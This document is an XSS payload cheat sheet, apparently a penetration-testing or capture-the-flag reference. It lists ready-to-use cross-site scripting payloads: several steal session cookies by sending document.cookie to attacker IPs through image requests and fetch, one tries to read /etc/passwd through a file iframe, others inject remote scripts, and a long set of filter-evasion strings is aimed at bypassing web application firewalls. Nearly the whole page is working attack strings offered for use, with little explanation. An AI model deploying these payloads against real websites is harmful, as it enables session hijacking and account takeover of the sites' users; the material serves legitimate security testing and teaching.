Basic Payloads
<svg/onload="alert(document.cookie)">
<iframe src="data:image/svg+xml;base64,CjxzdmcgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+CiAgPGNpcmNsZSByPSIxMCIgY3g9IjEwIiBjeT0iMTAiIGZpbGw9ImdyZWVuIi8+CiAgPGltYWdlIGhyZWY9IngiIG9uZXJyb3I9ImphdmFzY3JpcHQ6YWxlcnQoJ1hTUycpIiAvPgo8L3N2Zz4="></iframe>
<script>var i=new Image(); i.src="http://10.10.14.54/?cookie="+btoa(document.cookie);</script>
<script>var i=new Image;i.src="http://10.10.14.7:8888/?cookie="+document.cookie;</script>
<script> document.write('<img src="http://10.10.14.54/?cookie='+document.cookie+'" />'); </script>
<img src/onerror=this.src="http://10.10.14.74/?cookie="+btoa(document.cookie)>
<img src="http://10.10.14.54/" onload="var i=0;if(i++)this.src+='?cookie='+encodeURIComponent(document.cookie);"/>
<script>fetch('http://10.10.14.19:8000/?cookie=' + btoa(document.cookie));</script>
Local File Access / Script Injection
<img src=xasdasdasd onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
<img src=gdgdgdfgert onerror="document.write('<script src=http://127.0.0.1/test.js></script>')"/>
<img src=x onerror=fetch('http://10.10.xx.xx/?cookie='+document.cookie);>
WAF Bypass Strings for XSS
<Img src = x onerror = "javascript: window.onerror = alert; throw XSS">
<Video> <source onerror = "javascript: alert (XSS)">
<Input value = "XSS" type = text>
<applet code="javascript:confirm(document.cookie);">
<isindex x="javascript:" onmouseover="alert(XSS)">
"></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
"><img src="x:x" onerror="alert(XSS)">
"><iframe src="javascript:alert(XSS)">
<object data="javascript:alert(XSS)">
<isindex type=image src=1 onerror=alert(XSS)>
<img src=x:alert(alt) onerror=eval(src) alt=0>
<img src="x:gif" onerror="window "></img>
<iframe/src="data:text/html,<svg onload=alert(1)>">
<meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>
<svg><script xlink:href=data:,window.open('https://www.google.com/')></script
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<iframe src=javascript:alert(document.location)>
<form><a href="javascript:\u0061lert(1)">X
</script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'>
<style>//*{x:expression(alert(/xss/))}//<style></style>
Resources
OWASP XSS Filter Evasion Cheat Sheet